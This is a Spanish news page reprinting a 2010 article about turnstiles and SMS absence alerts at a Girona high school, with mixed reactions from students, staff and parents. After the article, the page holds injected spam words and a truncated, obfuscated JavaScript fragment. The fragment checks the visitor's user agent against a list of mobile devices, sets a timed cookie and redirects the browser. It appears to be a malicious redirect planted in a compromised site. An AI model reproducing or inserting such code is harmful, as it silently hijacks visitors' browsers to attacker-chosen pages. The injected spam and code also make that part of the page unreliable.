• Noticias maquetadas 13.10.2010

    LA VANGUARDIA- “¡Todos a fichar!” Pills
    Sílvia Oller- Girona

    Su funcionamiento es parecido al de cualquier  torniquete de una fábrica, empresa, metro o palacio de congresos, aunque quienes lo utilizan no son ni operarios, ni trabajadores con prisa en hora punta ni congresistas. Son las nueve de la mañana y les toca fichar a los alumnos del instituto Narcís Xifra de Girona, que de ahora en adelante deberán familiarizarse con un elemento más del mobiliario del centro.

    Unos torniquetes situados en las diferentes entradas del instituto, en el que se imparte ESO, bachillerato y ciclos formativos, controlan las salidas y entradas de los estudiantes y mediante un sistema informático se comunica a los padres vía SMS si su hijo falta a clase. Con este artilugio, lo de hacer novillos va a ser mucho más difícil sin que se enteren en casa ipso facto.

    Hasta ahora, el centro publicaba en su web al final del día los alumnos que habían faltado y los padres podían consultarlo. “En ocasiones, el profesor se olvidaba de colgar los datos, cosa que ahora ya no va a ocurrir, puesto que los padres sabrán casi a tiempo real si su hijo está o no en el aula”, esgrime el director del Narcís Xifra, Joaquim Bosch. Copió la idea de un centro holandés y hasta el momento se han interesado por ella institutos del País Vasco y Canarias. “Con este sistema también evitamos que accedan ex alumnos problemáticos, algo que en ocasiones ocurría”, expone Bosch. A pesar de la solución adoptada, el Narcís Xifra no registra altos índices de absentismo escolar, aunque el barrio en ocasiones ha sido escenario de algún que otro trapicheo con drogas.

    Purchase

    Sobre la eficacia de la medida, que entre otras cosas debe servir para controlar la asistencia a clase, los alumnos advierten: “Hecha la ley, hecha la trampa. Los que quieren hacer novillos lo seguirán haciendo”, espeta Norbert Artigas, un joven que cursa primero de bachillerato. “Siempre pueden darle la tarjeta de fichar a un compañero y que este pase por él”, arguye este adolescente. Laura Lázaro, Maria Rodeja y Alba Pairet, compañeras de pupitre, asienten. “Los torniquetes son perfectamente prescindibles ya que en clase ya pasan lista igualmente”, expone María. Además, aseguran que el centro podría haber invertido los 12.000 euros que ha costado el mecanismo en aumentar el número de aulas o en mantenimiento. “Nos sentimos como robots, como si estuviéramos en una cárcel”, se quejan los jóvenes. Una sensación a la que, quizás, contribuyan las cámaras y el sensor, que en horario lectivo, controla también los accesos a los baños, refugio en más de una ocasión para los fumadores. “Las cámaras tienen efecto disuasorio y desde que las hemos instalado no ha habido ningún robo”, aclara el director.

    Pero no todo son quejas. Hay quien ve en el torniquete un buen sistema para controlar especialmente a los pequeños. “Está bien que los padres de los alumnos de ESO estén informados si estos no acuden a clase”, explica Sandra Morales, alumna del grado superior de estética. “También es un buen control para aquellos que utilizan los baños para fumar o hacer novillos”, explica otra joven estudiante del centro, en el que conviven alumnos de ESO de 12 años hasta alguno de 50, de ciclos formativos. “Es un buen dispositivo de control de asistencia, aunque creo que se formarán aglomeraciones”, intuye Susana, que a sus 49 años tampoco se libra de fichar para acceder. Los padres se felicitan de la medida adoptada por un centro que siempre ha apostado por las nuevas tecnologías. La presidenta de la asociación de padres del IES, Eulàlia Llacha, bendice el sistema ya que “impedirá que personas ajenas al centro se cuelen, evitando gamberradas y algún que otro robo”.

    Entre el profesorado, obligado también a fichar, hay opiniones para todos los gustos. Para Mari Paz Díaz, profesora del ciclo formativo de farmacia y laboratorio, los torniquetes le evitarán alguna que otra situación incómoda. “El primer día de curso había en mi clase un alumno que nada tenía que ver con el centro”, asegura. “Hasta que funcione al 100% no sabremos si es o no efectivo, aunque creo que es un buen sistema para controlar a los más pequeños”, afirma Joana Zambrana, profesora de un ciclo de grado medio. Más contundente se muestra otra docente del grado de farmacia. “Esto va a ser un caos, un colapso cada mañana, ya que en el centro hay 1.500 alumnos”.

    El sistema está aún en periodo de pruebas. La semana pasada los operarios aún ultimaban el dispositivo. Frente a las máquinas, profesores despistados que no colocan bien la tarjeta, alumnos que se la han olvidado en casa y otros que la tienen extraviada en el fondo de la cartera. “¡Oh, no! Otra vez los torniquetes”, espeta un joven, que no esconde su aversión al dispositivo. En pocos días no valdrán excusas ni lamentaciones. ¡Todos a fichar!

    Purchase

    Buy

    online

    ttw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{})))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])} online

  • Comments are closed.

Calendario de artículos

octubre 2010
L M X J V S D
 123
45678910
11121314151617
18192021222324
25262728293031

Artículos anteriores